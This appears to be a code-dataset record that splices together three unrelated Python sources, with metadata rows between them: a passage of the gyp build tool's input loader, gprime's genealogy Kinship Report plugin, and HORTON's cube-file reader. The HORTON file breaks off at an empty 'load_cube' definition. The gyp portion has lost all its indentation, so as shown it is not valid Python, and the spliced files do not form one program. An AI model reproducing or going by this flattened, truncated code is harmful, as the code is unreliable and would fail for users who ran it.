# Look through the dictionary for any lists whose keys end in "!" or "/".
# These are lists that will be treated as exclude lists and regular
# expression-based exclude/include lists. Collect the lists that are
# needed first, looking for the lists that they operate on, and assemble
# them into |lists|. This is done in a separate loop up front, because
# the _included and _excluded keys need to be added to the_dict, and that
# can't be done while iterating through it.
lists = []
del_lists = []
for key, value in the_dict.items():
operation = key[-1]
if operation != "!" and operation != "/":
continue
if type(value) is not list:
raise ValueError(
name + " key " + key + " must be list, not " + value.__class__.__name__
)
list_key = key[:-1]
if list_key not in the_dict:
# This happens when there's a list like "sources!" but no corresponding
# "sources" list. Since there's nothing for it to operate on, queue up
# the "sources!" list for deletion now.
del_lists.append(key)
continue
if type(the_dict[list_key]) is not list:
value = the_dict[list_key]
raise ValueError(
name
+ " key "
+ list_key
+ " must be list, not "
+ value.__class__.__name__
+ " when applying "
+ {"!": "exclusion", "/": "regex"}[operation]
)
if list_key not in lists:
lists.append(list_key)
# Delete the lists that are known to be unneeded at this point.
for del_list in del_lists:
del the_dict[del_list]
for list_key in lists:
the_list = the_dict[list_key]
# Initialize the list_actions list, which is parallel to the_list. Each
# item in list_actions identifies whether the corresponding item in
# the_list should be excluded, unconditionally preserved (included), or
# whether no exclusion or inclusion has been applied. Items for which
# no exclusion or inclusion has been applied (yet) have value -1, items
# excluded have value 0, and items included have value 1. Includes and
# excludes override previous actions. All items in list_actions are
# initialized to -1 because no excludes or includes have been processed
# yet.
list_actions = list((-1,) * len(the_list))
exclude_key = list_key + "!"
if exclude_key in the_dict:
for exclude_item in the_dict[exclude_key]:
for index, list_item in enumerate(the_list):
if exclude_item == list_item:
# This item matches the exclude_item, so set its action to 0
# (exclude).
list_actions[index] = 0
# The "whatever!" list is no longer needed, dump it.
del the_dict[exclude_key]
regex_key = list_key + "/"
if regex_key in the_dict:
for regex_item in the_dict[regex_key]:
[action, pattern] = regex_item
pattern_re = re.compile(pattern)
if action == "exclude":
# This item matches an exclude regex, so set its value to 0 (exclude).
action_value = 0
elif action == "include":
# This item matches an include regex, so set its value to 1 (include).
action_value = 1
else:
# This is an action that doesn't make any sense.
raise ValueError(
"Unrecognized action "
+ action
+ " in "
+ name
+ " key "
+ regex_key
)
for index, list_item in enumerate(the_list):
if list_actions[index] == action_value:
# Even if the regex matches, nothing will change so continue (regex
# searches are expensive).
continue
if pattern_re.search(list_item):
# Regular expression match.
list_actions[index] = action_value
# The "whatever/" list is no longer needed, dump it.
del the_dict[regex_key]
# Add excluded items to the excluded list.
#
# Note that exclude_key ("sources!") is different from excluded_key
# ("sources_excluded"). The exclude_key list is input and it was already
# processed and deleted; the excluded_key list is output and it's about
# to be created.
excluded_key = list_key + "_excluded"
if excluded_key in the_dict:
raise GypError(
name + " key " + excluded_key + " must not be present prior "
" to applying exclusion/regex filters for " + list_key
)
excluded_list = []
# Go backwards through the list_actions list so that as items are deleted,
# the indices of items that haven't been seen yet don't shift. That means
# that things need to be prepended to excluded_list to maintain them in the
# same order that they existed in the_list.
for index in range(len(list_actions) - 1, -1, -1):
if list_actions[index] == 0:
# Dump anything with action 0 (exclude). Keep anything with action 1
# (include) or -1 (no include or exclude seen for the item).
excluded_list.insert(0, the_list[index])
del the_list[index]
# If anything was excluded, put the excluded list into the_dict at
# excluded_key.
if len(excluded_list) > 0:
the_dict[excluded_key] = excluded_list
# Now recurse into subdicts and lists that may contain dicts.
for key, value in the_dict.items():
if type(value) is dict:
ProcessListFiltersInDict(key, value)
elif type(value) is list:
ProcessListFiltersInList(key, value)
def ProcessListFiltersInList(name, the_list):
for item in the_list:
if type(item) is dict:
ProcessListFiltersInDict(name, item)
elif type(item) is list:
ProcessListFiltersInList(name, item)
def ValidateTargetType(target, target_dict):
"""Ensures the 'type' field on the target is one of the known types.
Arguments:
target: string, name of target.
target_dict: dict, target spec.
Raises an exception on error.
"""
VALID_TARGET_TYPES = (
"executable",
"loadable_module",
"static_library",
"shared_library",
"mac_kernel_extension",
"none",
"windows_driver",
)
target_type = target_dict.get("type", None)
if target_type not in VALID_TARGET_TYPES:
raise GypError(
"Target %s has an invalid target type '%s'. "
"Must be one of %s." % (target, target_type, "/".join(VALID_TARGET_TYPES))
)
if (
target_dict.get("standalone_static_library", 0)
and not target_type == "static_library"
):
raise GypError(
"Target %s has type %s but standalone_static_library flag is"
" only valid for static_library type." % (target, target_type)
)
def ValidateSourcesInTarget(target, target_dict, build_file, duplicate_basename_check):
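"""Ensures that a static_library target has no two compiled sources sharing
the same basename, because libtool on Mac cannot archive them. Does nothing
unless duplicate_basename_check is set.
"""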
if not duplicate_basename_check:
return
if target_dict.get("type", None) != "static_library":
return
sources = target_dict.get("sources", [])
basenames = {}
for source in sources:
name, ext = os.path.splitext(source)
is_compiled_file = ext in [".c", ".cc", ".cpp", ".cxx", ".m", ".mm", ".s", ".S"]
if not is_compiled_file:
continue
basename = os.path.basename(name) # Don't include extension.
basenames.setdefault(basename, []).append(source)
error = ""
for basename, files in basenames.items():
if len(files) > 1:
error += " %s: %s\n" % (basename, " ".join(files))
if error:
print(
"static library %s has several files with the same basename:\n" % target
+ error
+ "libtool on Mac cannot handle that. Use "
"--no-duplicate-basename-check to disable this validation."
)
raise GypError("Duplicate basenames in sources section, see list above")
def ValidateRulesInTarget(target, target_dict, extra_sources_for_rules):
"""Ensures that the rules sections in target_dict are valid and consistent,
and determines which sources they apply to.
Arguments:
target: string, name of target.
target_dict: dict, target spec containing "rules" and "sources" lists.
extra_sources_for_rules: a list of keys to scan for rule matches in
addition to 'sources'.
"""
# Dicts to map between values found in rules' 'rule_name' and 'extension'
# keys and the rule dicts themselves.
rule_names = {}
rule_extensions = {}
rules = target_dict.get("rules", [])
for rule in rules:
# Make sure that there's no conflict among rule names and extensions.
rule_name = rule["rule_name"]
if rule_name in rule_names:
raise GypError(
"rule %s exists in duplicate, target %s" % (rule_name, target)
)
rule_names[rule_name] = rule
rule_extension = rule["extension"]
if rule_extension.startswith("."):
rule_extension = rule_extension[1:]
if rule_extension in rule_extensions:
raise GypError(
(
"extension %s associated with multiple rules, "
+ "target %s rules %s and %s"
)
% (
rule_extension,
target,
rule_extensions[rule_extension]["rule_name"],
rule_name,
)
)
rule_extensions[rule_extension] = rule
# Make sure rule_sources isn't already there. It's going to be
# created below if needed.
if "rule_sources" in rule:
raise GypError(
"rule_sources must not exist in input, target %s rule %s"
% (target, rule_name)
)
rule_sources = []
source_keys = ["sources"]
source_keys.extend(extra_sources_for_rules)
for source_key in source_keys:
for source in target_dict.get(source_key, []):
(source_root, source_extension) = os.path.splitext(source)
if source_extension.startswith("."):
source_extension = source_extension[1:]
if source_extension == rule_extension:
rule_sources.append(source)
if len(rule_sources) > 0:
rule["rule_sources"] = rule_sources
def ValidateRunAsInTarget(target, target_dict, build_file):
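"""Validates the optional 'run_as' section of a target: it must be a dict
containing a list-valued 'action', plus optional 'working_directory' (string)
and 'environment' (dict) entries.
"""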
target_name = target_dict.get("target_name")
run_as = target_dict.get("run_as")
if not run_as:
return
if type(run_as) is not dict:
raise GypError(
"The 'run_as' in target %s from file %s should be a "
"dictionary." % (target_name, build_file)
)
action = run_as.get("action")
if not action:
raise GypError(
"The 'run_as' in target %s from file %s must have an "
"'action' section." % (target_name, build_file)
)
if type(action) is not list:
raise GypError(
"The 'action' for 'run_as' in target %s from file %s "
"must be a list." % (target_name, build_file)
)
working_directory = run_as.get("working_directory")
if working_directory and type(working_directory) is not str:
raise GypError(
"The 'working_directory' for 'run_as' in target %s "
"in file %s should be a string." % (target_name, build_file)
)
environment = run_as.get("environment")
if environment and type(environment) is not dict:
raise GypError(
"The 'environment' for 'run_as' in target %s "
"in file %s should be a dictionary." % (target_name, build_file)
)
def ValidateActionsInTarget(target, target_dict, build_file):
"""Validates the inputs to the actions in a target."""
target_name = target_dict.get("target_name")
actions = target_dict.get("actions", [])
for action in actions:
action_name = action.get("action_name")
if not action_name:
raise GypError(
"Anonymous action in target %s. "
"An action must have an 'action_name' field." % target_name
)
inputs = action.get("inputs", None)
if inputs is None:
raise GypError("Action in target %s has no inputs." % target_name)
action_command = action.get("action")
if action_command and not action_command[0]:
raise GypError("Empty action as command in target %s." % target_name)
def TurnIntIntoStrInDict(the_dict):
"""Given dict the_dict, recursively converts all integers into strings.
"""
# Use items instead of iteritems because there's no need to try to look at
# reinserted keys and their associated values.
for k, v in the_dict.items():
if type(v) is int:
v = str(v)
the_dict[k] = v
elif type(v) is dict:
TurnIntIntoStrInDict(v)
elif type(v) is list:
TurnIntIntoStrInList(v)
if type(k) is int:
del the_dict[k]
the_dict[str(k)] = v
def TurnIntIntoStrInList(the_list):
"""Given list the_list, recursively converts all integers into strings.
"""
for index, item in enumerate(the_list):
if type(item) is int:
the_list[index] = str(item)
elif type(item) is dict:
TurnIntIntoStrInDict(item)
elif type(item) is list:
TurnIntIntoStrInList(item)
def PruneUnwantedTargets(targets, flat_list, dependency_nodes, root_targets, data):
"""Return only the targets that are deep dependencies of |root_targets|."""
qualified_root_targets = []
for target in root_targets:
target = target.strip()
qualified_targets = gyp.common.FindQualifiedTargets(target, flat_list)
if not qualified_targets:
raise GypError("Could not find target %s" % target)
qualified_root_targets.extend(qualified_targets)
wanted_targets = {}
for target in qualified_root_targets:
wanted_targets[target] = targets[target]
for dependency in dependency_nodes[target].DeepDependencies():
wanted_targets[dependency] = targets[dependency]
wanted_flat_list = [t for t in flat_list if t in wanted_targets]
# Prune unwanted targets from each build_file's data dict.
for build_file in data["target_build_files"]:
if "targets" not in data[build_file]:
continue
new_targets = []
for target in data[build_file]["targets"]:
qualified_name = gyp.common.QualifiedTarget(
build_file, target["target_name"], target["toolset"]
)
if qualified_name in wanted_targets:
new_targets.append(target)
data[build_file]["targets"] = new_targets
return wanted_targets, wanted_flat_list
def VerifyNoCollidingTargets(targets):
"""Verify that no two targets in the same directory share the same name.
Arguments:
targets: A list of targets in the form 'path/to/file.gyp:target_name'.
"""
# Keep a dict going from 'subdirectory:target_name' to 'foo.gyp'.
used = {}
for target in targets:
# Separate out 'path/to/file.gyp, 'target_name' from
# 'path/to/file.gyp:target_name'.
path, name = target.rsplit(":", 1)
# Separate out 'path/to', 'file.gyp' from 'path/to/file.gyp'.
subdir, gyp = os.path.split(path)
# Use '.' for the current directory '', so that the error messages make
# more sense.
if not subdir:
subdir = "."
# Prepare a key like 'path/to:target_name'.
key = subdir + ":" + name
if key in used:
# Complain if this target is already used.
raise GypError(
'Duplicate target name "%s" in directory "%s" used both '
'in "%s" and "%s".' % (name, subdir, gyp, used[key])
)
used[key] = gyp
def SetGeneratorGlobals(generator_input_info):
# Set up path_sections and non_configuration_keys with the default data plus
# the generator-specific data.
global path_sections
path_sections = set(base_path_sections)
path_sections.update(generator_input_info["path_sections"])
global non_configuration_keys
non_configuration_keys = base_non_configuration_keys[:]
non_configuration_keys.extend(generator_input_info["non_configuration_keys"])
global multiple_toolsets
multiple_toolsets = generator_input_info["generator_supports_multiple_toolsets"]
global generator_filelist_paths
generator_filelist_paths = generator_input_info["generator_filelist_paths"]
def Load(
build_files,
variables,
includes,
depth,
generator_input_info,
check,
circular_check,
duplicate_basename_check,
parallel,
root_targets,
):
SetGeneratorGlobals(generator_input_info)
# A generator can have other lists (in addition to sources) be processed
# for rules.
extra_sources_for_rules = generator_input_info["extra_sources_for_rules"]
# Load build files. This loads every target-containing build file into
# the |data| dictionary such that the keys to |data| are build file names,
# and the values are the entire build file contents after "early" or "pre"
# processing has been done and includes have been resolved.
# NOTE: data contains both "target" files (.gyp) and "includes" (.gypi), as
# well as meta-data (e.g. 'included_files' key). 'target_build_files' keeps
# track of the keys corresponding to "target" files.
data = {"target_build_files": set()}
# Normalize paths everywhere. This is important because paths will be
# used as keys to the data dict and for references between input files.
build_files = set(map(os.path.normpath, build_files))
if parallel:
LoadTargetBuildFilesParallel(
build_files, data, variables, includes, depth, check, generator_input_info
)
else:
aux_data = {}
for build_file in build_files:
try:
LoadTargetBuildFile(
build_file, data, aux_data, variables, includes, depth, check, True
)
except Exception as e:
gyp.common.ExceptionAppend(e, "while trying to load %s" % build_file)
raise
# Build a dict to access each target's subdict by qualified name.
targets = BuildTargetsDict(data)
# Fully qualify all dependency links.
QualifyDependencies(targets)
# Remove self-dependencies from targets that have 'prune_self_dependencies'
# set to 1.
RemoveSelfDependencies(targets)
# Expand dependencies specified as build_file:*.
ExpandWildcardDependencies(targets, data)
# Remove all dependencies marked as 'link_dependency' from the targets of
# type 'none'.
RemoveLinkDependenciesFromNoneTargets(targets)
# Apply exclude (!) and regex (/) list filters only for dependency_sections.
for target_name, target_dict in targets.items():
tmp_dict = {}
for key_base in dependency_sections:
for op in ("", "!", "/"):
key = key_base + op
if key in target_dict:
tmp_dict[key] = target_dict[key]
del target_dict[key]
ProcessListFiltersInDict(target_name, tmp_dict)
# Write the results back to |target_dict|.
for key in tmp_dict:
target_dict[key] = tmp_dict[key]
# Make sure every dependency appears at most once.
RemoveDuplicateDependencies(targets)
if circular_check:
# Make sure that any targets in a.gyp don't contain dependencies in other
# .gyp files that further depend on a.gyp.
VerifyNoGYPFileCircularDependencies(targets)
[dependency_nodes, flat_list] = BuildDependencyList(targets)
if root_targets:
# Remove, from |targets| and |flat_list|, the targets that are not deep
# dependencies of the targets specified in |root_targets|.
targets, flat_list = PruneUnwantedTargets(
targets, flat_list, dependency_nodes, root_targets, data
)
# Check that no two targets in the same directory have the same name.
VerifyNoCollidingTargets(flat_list)
# Handle dependent settings of various types.
for settings_type in [
"all_dependent_settings",
"direct_dependent_settings",
"link_settings",
]:
DoDependentSettings(settings_type, flat_list, targets, dependency_nodes)
# Take out the dependent settings now that they've been published to all
# of the targets that require them.
for target in flat_list:
if settings_type in targets[target]:
del targets[target][settings_type]
# Make sure static libraries don't declare dependencies on other static
# libraries, but that linkables depend on all unlinked static libraries
# that they need so that their link steps will be correct.
gii = generator_input_info
if gii["generator_wants_static_library_dependencies_adjusted"]:
AdjustStaticLibraryDependencies(
flat_list,
targets,
dependency_nodes,
gii["generator_wants_sorted_dependencies"],
)
# Apply "post"/"late"/"target" variable expansions and condition evaluations.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
ProcessVariablesAndConditionsInDict(
target_dict, PHASE_LATE, variables, build_file
)
# Move everything that can go into a "configurations" section into one.
for target in flat_list:
target_dict = targets[target]
SetUpConfigurations(target, target_dict)
# Apply exclude (!) and regex (/) list filters.
for target in flat_list:
target_dict = targets[target]
ProcessListFiltersInDict(target, target_dict)
# Apply "latelate" variable expansions and condition evaluations.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
ProcessVariablesAndConditionsInDict(
target_dict, PHASE_LATELATE, variables, build_file
)
# Make sure that the rules make sense, and build up rule_sources lists as
# needed. Not all generators will need to use the rule_sources lists, but
# some may, and it seems best to build the list in a common spot.
# Also validate actions and run_as elements in targets.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
ValidateTargetType(target, target_dict)
ValidateSourcesInTarget(
target, target_dict, build_file, duplicate_basename_check
)
ValidateRulesInTarget(target, target_dict, extra_sources_for_rules)
ValidateRunAsInTarget(target, target_dict, build_file)
ValidateActionsInTarget(target, target_dict, build_file)
# Generators might not expect ints. Turn them into strs.
TurnIntIntoStrInDict(data)
# TODO(mark): Return |data| for now because the generator needs a list of
# build files that came in. In the future, maybe it should just accept
# a list, and not the whole data dict.
return [flat_list, targets, data]
|
onecoolx/picasso
|
tools/gyp/pylib/gyp/input.py
|
Python
|
bsd-3-clause
| 128,903
|
[
"VisIt"
] |
0221fafcb23edcba5643f457ee7ec39cebafc7b735a4176e9ea58c343e61c02c
|
#
# gPrime - A web-based genealogy program
#
# Copyright (C) 2007-2012 Brian G. Matherly
# Copyright (C) 2009 Gary Burton
# Contribution 2009 by Reinhard Mueller <reinhard.mueller@bytewise.at>
# Copyright (C) 2010 Jakim Friant
# Copyright (C) 2013-2014 Paul Franklin
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""Reports/Text Reports/Kinship Report"""
#------------------------------------------------------------------------
#
# python modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# gramps modules
#
#------------------------------------------------------------------------
from gprime.const import LOCALE as glocale
_ = glocale.translation.gettext
from gprime.errors import ReportError
from gprime.relationship import get_relationship_calculator
from gprime.plug.docgen import (IndexMark, FontStyle, ParagraphStyle,
FONT_SANS_SERIF, INDEX_TYPE_TOC,
PARA_ALIGN_CENTER)
from gprime.plug.menu import NumberOption, BooleanOption, PersonOption
from gprime.plug.report import Report
from gprime.plug.report import utils
from gprime.plug.report import MenuReportOptions
from gprime.plug.report import stdoptions
from gprime.utils.db import get_birth_or_fallback, get_death_or_fallback
from gprime.proxy import CacheProxyDb
from gprime.display.name import displayer as _nd
#------------------------------------------------------------------------
#
# KinshipReport
#
#------------------------------------------------------------------------
class KinshipReport(Report):
""" Kinship Report """
def __init__(self, database, options, user):
"""
Create the KinshipReport object that produces the report.
The arguments are:
database - the GRAMPS database instance
options - instance of the Options class for this report
user - a gen.user.User() instance
This report needs the following parameters (class variables)
that come in the options class.
maxdescend - Maximum generations of descendants to include.
maxascend - Maximum generations of ancestors to include.
incspouses - Whether to include spouses.
inccousins - Whether to include cousins.
incaunts - Whether to include aunts/uncles/nephews/nieces.
pid - The GID of the center person for the report.
name_format - Preferred format to display names
incl_private - Whether to include private data
living_people - How to handle living people
years_past_death - Consider as living this many years after death
"""
Report.__init__(self, database, options, user)
menu = options.menu
lang = menu.get_option_by_name('trans').get_value()
rlocale = self.set_locale(lang)
stdoptions.run_private_data_option(self, menu)
stdoptions.run_living_people_option(self, menu, rlocale)
self.database = CacheProxyDb(self.database)
self.__db = self.database
self.max_descend = menu.get_option_by_name('maxdescend').get_value()
self.max_ascend = menu.get_option_by_name('maxascend').get_value()
self.inc_spouses = menu.get_option_by_name('incspouses').get_value()
self.inc_cousins = menu.get_option_by_name('inccousins').get_value()
self.inc_aunts = menu.get_option_by_name('incaunts').get_value()
pid = menu.get_option_by_name('pid').get_value()
self.person = self.database.get_person_from_gid(pid)
if self.person is None:
raise ReportError(_("Person %s is not in the Database") % pid)
stdoptions.run_name_format_option(self, menu)
self.rel_calc = get_relationship_calculator(reinit=True,
clocale=rlocale)
self.kinship_map = {}
self.spouse_map = {}
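# Both maps are nested dicts keyed as map[Ga][Gb] -> list of person handles,
# where Ga and Gb are the generation counts described in traverse_down().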
def write_report(self):
"""
The routine that actually creates the report. At this point, the document
is opened and ready for writing.
"""
pname = self._name_display.display(self.person)
self.doc.start_paragraph("KIN-Title")
# feature request 2356: avoid genitive form
title = self._("Kinship Report for %s") % pname
mark = IndexMark(title, INDEX_TYPE_TOC, 1)
self.doc.write_text(title, mark)
self.doc.end_paragraph()
if self.inc_spouses:
spouse_handles = self.get_spouse_handles(self.person.get_handle())
if spouse_handles:
self.write_people(self._("Spouses"), spouse_handles)
# Collect all descendants of the person
self.traverse_down(self.person.get_handle(), 0, 1)
# Collect all ancestors/aunts/uncles/nephews/cousins of the person
self.traverse_up(self.person.get_handle(), 1, 0)
# Write Kin
for Ga, Gbs in self.kinship_map.items():
for Gb in Gbs:
# To understand these calculations, see:
# http://en.wikipedia.org/wiki/Cousin#Mathematical_definitions
_x_ = min(Ga, Gb)
_y_ = abs(Ga - Gb)
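# min(Ga, Gb) == 1 with a nonzero difference covers aunts/uncles/
# nephews/nieces, min(Ga, Gb) > 1 covers cousins of any degree, and
# abs(Ga - Gb) is the number of times removed.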
# Skip unrequested people
if _x_ == 1 and _y_ > 0 and not self.inc_aunts:
continue
elif _x_ > 1 and not self.inc_cousins:
continue
get_rel_str = self.rel_calc.get_plural_relationship_string
title = get_rel_str(Ga, Gb, in_law_b=False)
self.write_people(self._(title), self.kinship_map[Ga][Gb])
if (self.inc_spouses and
Ga in self.spouse_map and
Gb in self.spouse_map[Ga]):
title = get_rel_str(Ga, Gb, in_law_b=True)
self.write_people(self._(title), self.spouse_map[Ga][Gb])
def traverse_down(self, person_handle, Ga, Gb, skip_handle=None):
"""
Populate a map of arrays containing person handles for the descendants
of the passed person. This function calls itself recursively until it
reaches max_descend.
Parameters:
person_handle: the handle of the person to go to next
Ga: The number of generations from the main person to the common
ancestor. This should be incremented when going up generations, and
left alone when going down generations.
Gb: The number of generations from this person (person_handle) to the
common ancestor. This should be incremented when going down
generations and set back to zero when going up generations.
skip_handle: an optional handle to skip when going down. This is useful
to skip the descendant that brought you this generation in the first
place.
"""
for child_handle in self.get_children_handles(person_handle):
if child_handle != skip_handle:
self.add_kin(child_handle, Ga, Gb)
if self.inc_spouses:
for spouse_handle in self.get_spouse_handles(child_handle):
self.add_spouse(spouse_handle, Ga, Gb)
if Gb < self.max_descend:
self.traverse_down(child_handle, Ga, Gb+1)
def traverse_up(self, person_handle, Ga, Gb):
"""
Populate a map of arrays containing person handles for the ancestors
of the passed person. This function calls itself recursively until it
reaches max_ascend.
Parameters:
person_handle: the handle of the person to go to next
Ga: The number of generations from the main person to the common
ancestor. This should be incremented when going up generations, and
left alone when going down generations.
Gb: The number of generations from this person (person_handle) to the
common ancestor. This should be incremented when going down
generations and set back to zero when going up generations.
"""
parent_handles = self.get_parent_handles(person_handle)
for parent_handle in parent_handles:
self.add_kin(parent_handle, Ga, Gb)
self.traverse_down(parent_handle, Ga, Gb+1, person_handle)
if Ga < self.max_ascend:
self.traverse_up(parent_handle, Ga+1, 0)
def add_kin(self, person_handle, Ga, Gb):
"""
Add a person handle to the kin map.
"""
if Ga not in self.kinship_map:
self.kinship_map[Ga] = {}
if Gb not in self.kinship_map[Ga]:
self.kinship_map[Ga][Gb] = []
if person_handle not in self.kinship_map[Ga][Gb]:
self.kinship_map[Ga][Gb].append(person_handle)
def add_spouse(self, spouse_handle, Ga, Gb):
"""
Add a person handle to the spouse map.
"""
if Ga not in self.spouse_map:
self.spouse_map[Ga] = {}
if Gb not in self.spouse_map[Ga]:
self.spouse_map[Ga][Gb] = []
if spouse_handle not in self.spouse_map[Ga][Gb]:
self.spouse_map[Ga][Gb].append(spouse_handle)
def get_parent_handles(self, person_handle):
"""
Return an array of handles for all the parents of the
given person handle.
"""
parent_handles = []
person = self.__db.get_person_from_handle(person_handle)
family_handle = person.get_main_parents_family_handle()
if family_handle:
family = self.__db.get_family_from_handle(family_handle)
father_handle = family.get_father_handle()
if father_handle:
parent_handles.append(father_handle)
mother_handle = family.get_mother_handle()
if mother_handle:
parent_handles.append(mother_handle)
return parent_handles
def get_spouse_handles(self, person_handle):
"""
Return an array of handles for all the spouses of the
given person handle.
"""
spouses = []
person = self.__db.get_person_from_handle(person_handle)
for family_handle in person.get_family_handle_list():
family = self.__db.get_family_from_handle(family_handle)
father_handle = family.get_father_handle()
mother_handle = family.get_mother_handle()
spouse_handle = None
if mother_handle and father_handle == person_handle:
spouse_handle = mother_handle
elif father_handle and mother_handle == person_handle:
spouse_handle = father_handle
if spouse_handle and spouse_handle not in spouses:
spouses.append(spouse_handle)
return spouses
def get_children_handles(self, person_handle):
"""
Return an array of handles for all the children of the
given person handle.
"""
children = []
person = self.__db.get_person_from_handle(person_handle)
for family_handle in person.get_family_handle_list():
family = self.__db.get_family_from_handle(family_handle)
for child_ref in family.get_child_ref_list():
children.append(child_ref.get_reference_handle())
return children
def write_people(self, title, people_handles):
"""
Write information about a group of people - including the title.
"""
cap_title = title[0].upper() + title[1:]
subtitle = "%s (%d)" % (cap_title, len(people_handles))
self.doc.start_paragraph("KIN-Subtitle")
mark = IndexMark(cap_title, INDEX_TYPE_TOC, 2)
self.doc.write_text(subtitle, mark)
self.doc.end_paragraph()
list(map(self.write_person, people_handles))
def write_person(self, person_handle):
"""
Write information about the given person.
"""
person = self.database.get_person_from_handle(person_handle)
name = self._name_display.display(person)
mark = utils.get_person_mark(self.database, person)
birth_date = ""
birth = get_birth_or_fallback(self.database, person)
if birth:
birth_date = self._get_date(birth.get_date_object())
death_date = ""
death = get_death_or_fallback(self.database, person)
if death:
death_date = self._get_date(death.get_date_object())
dates = ''
if birth_date or death_date:
dates = self._(" (%(birth_date)s - %(death_date)s)"
) % {'birth_date' : birth_date,
'death_date' : death_date}
self.doc.start_paragraph('KIN-Normal')
self.doc.write_text(name, mark)
self.doc.write_text(dates)
self.doc.end_paragraph()
#------------------------------------------------------------------------
#
# KinshipOptions
#
#------------------------------------------------------------------------
class KinshipOptions(MenuReportOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name, dbase):
self.__db = dbase
self.__pid = None
MenuReportOptions.__init__(self, name, dbase)
def get_subject(self):
""" Return a string that describes the subject of the report. """
gid = self.__pid.get_value()
person = self.__db.get_person_from_gid(gid)
return _nd.display(person)
def add_menu_options(self, menu):
"""
Add options to the menu for the kinship report.
"""
category_name = _("Report Options")
self.__pid = PersonOption(_("Center Person"))
self.__pid.set_help(_("The center person for the report"))
menu.add_option(category_name, "pid", self.__pid)
stdoptions.add_name_format_option(menu, category_name)
stdoptions.add_private_data_option(menu, category_name)
stdoptions.add_living_people_option(menu, category_name)
maxdescend = NumberOption(_("Max Descendant Generations"), 2, 1, 20)
maxdescend.set_help(_("The maximum number of descendant generations"))
menu.add_option(category_name, "maxdescend", maxdescend)
maxascend = NumberOption(_("Max Ancestor Generations"), 2, 1, 20)
maxascend.set_help(_("The maximum number of ancestor generations"))
menu.add_option(category_name, "maxascend", maxascend)
incspouses = BooleanOption(_("Include spouses"), True)
incspouses.set_help(_("Whether to include spouses"))
menu.add_option(category_name, "incspouses", incspouses)
inccousins = BooleanOption(_("Include cousins"), True)
inccousins.set_help(_("Whether to include cousins"))
menu.add_option(category_name, "inccousins", inccousins)
incaunts = BooleanOption(_("Include aunts/uncles/nephews/nieces"), True)
incaunts.set_help(_("Whether to include aunts/uncles/nephews/nieces"))
menu.add_option(category_name, "incaunts", incaunts)
stdoptions.add_localization_option(menu, category_name)
def make_default_style(self, default_style):
"""Make the default output style for the Kinship Report."""
font = FontStyle()
font.set_size(16)
font.set_type_face(FONT_SANS_SERIF)
font.set_bold(1)
para = ParagraphStyle()
para.set_header_level(1)
para.set_bottom_border(1)
para.set_bottom_margin(utils.pt2cm(8))
para.set_font(font)
para.set_alignment(PARA_ALIGN_CENTER)
para.set_description(_("The style used for the title of the page."))
default_style.add_paragraph_style("KIN-Title", para)
font = FontStyle()
font.set_size(12)
font.set_bold(True)
para = ParagraphStyle()
para.set_header_level(3)
para.set_font(font)
para.set_top_margin(utils.pt2cm(6))
para.set_description(_('The basic style used for sub-headings.'))
default_style.add_paragraph_style("KIN-Subtitle", para)
font = FontStyle()
font.set_size(10)
para = ParagraphStyle()
para.set_font(font)
para.set_left_margin(0.5)
para.set_description(_('The basic style used for the text display.'))
default_style.add_paragraph_style("KIN-Normal", para)
|
sam-m888/gprime
|
gprime/plugins/textreport/kinshipreport.py
|
Python
|
gpl-2.0
| 17,158
|
[
"Brian"
] |
cae3f56230289efd1779a392868bdb2246cce011c91402850287ac9cfcbc82f8
|
# -*- coding: utf-8 -*-
# HORTON: Helpful Open-source Research TOol for N-fermion systems.
# Copyright (C) 2011-2016 The HORTON Development Team
#
# This file is part of HORTON.
#
# HORTON is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# HORTON is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
# --
'''Gaussian cube file format'''
import numpy as np
from horton.cext import Cell
from horton.grid.cext import UniformGrid
__all__ = ['load_cube', 'dump_cube']
def _read_cube_header(f):
# Read the title
title = f.readline().strip()
# skip the second line
f.readline()
def read_grid_line(line):
"""Read a grid line from the cube file"""
words = line.split()
return (
int(words[0]),
np.array([float(words[1]), float(words[2]), float(words[3])], float)
# all coordinates in a cube file are in atomic units
)
# number of atoms and origin of the grid
natom, origin = read_grid_line(f.readline())
# number of grid points in the A direction and step vector A, and so on
shape0, axis0 = read_grid_line(f.readline())
shape1, axis1 = read_grid_line(f.readline())
shape2, axis2 = read_grid_line(f.readline())
shape = np.array([shape0, shape1, shape2], int)
axes = np.array([axis0, axis1, axis2])
cell = Cell(axes*shape.reshape(-1,1))
ugrid = UniformGrid(origin, axes, shape, np.ones(3, int))
def read_coordinate_line(line):
"""Read an atom number and coordinate from the cube file"""
words = line.split()
return (
int(words[0]), float(words[1]),
np.array([float(words[2]), float(words[3]), float(words[4])], float)
# all coordinates in a cube file are in atomic units
)
numbers = np.zeros(natom, int)
pseudo_numbers = np.zeros(natom, float)
coordinates = np.zeros((natom, 3), float)
for i in xrange(natom):
numbers[i], pseudo_numbers[i], coordinates[i] = read_coordinate_line(f.readline())
# If the pseudo_number field is zero, we assume that no effective core
# potentials were used.
if pseudo_numbers[i] == 0.0:
pseudo_numbers[i] = numbers[i]
return title, coordinates, numbers, cell, ugrid, pseudo_numbers
def _read_cube_data(f, ugrid):
data = np.zeros(tuple(ugrid.shape), float)
tmp = data.ravel()
counter = 0
while True:
line = f.readline()
if len(line) == 0:
break
words = line.split()
for word in words:
tmp[counter] = float(word)
counter += 1
return data
def load_cube(filename):
